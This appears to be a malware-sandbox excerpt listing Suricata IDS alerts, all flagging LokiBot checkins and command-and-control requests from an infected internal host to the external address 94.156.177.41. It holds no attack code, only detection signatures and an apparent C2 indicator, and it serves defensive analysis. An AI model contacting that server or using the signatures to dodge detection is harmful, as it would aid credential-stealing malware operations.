Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50096 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50111 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50111 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50111 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50111 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50111 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50101 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50072 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50105 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50093 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49939 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49939 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49939 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49939 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49939 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49899 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49899 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49899 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49899 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49899 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49986 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49986 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49986 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49986 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49986 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50076 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50102 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50084 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50091 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50080 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50083 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50075 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50108 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50095 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50108 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50108 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50108 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50108 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50088 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 94.156.177.41:80
